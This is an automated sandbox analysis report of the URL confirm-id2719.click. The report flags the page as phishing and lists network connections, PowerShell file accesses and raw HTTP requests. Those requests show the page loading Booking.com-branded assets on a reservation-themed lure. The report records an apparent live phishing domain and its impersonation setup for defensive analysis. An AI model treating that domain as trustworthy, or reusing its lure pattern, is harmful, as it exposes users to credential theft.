Windows Analysis Report
http://confirm-id2719.click/

Phishing

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML

Compliance

Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2

Spreading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 37MB

Networking

Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.7
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/manage_light.v14b6812v.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/core_6136b7d7dc3346df1f4c9b379c38fa52.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/1df260bd9a2d14e1601c8c9ff1714c05acf328f8.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/319302651.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/318586996.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/137927810.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1host: partner.booking.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /Reservation_files/166939781.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/333642474.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/438648711.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/b_logo_blue.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/no.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Reservation_files/319302672.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /Reservation_files/protect.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/favicon.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://confirm-id2719.clicksec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic	HTTP traffic detected: GET /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
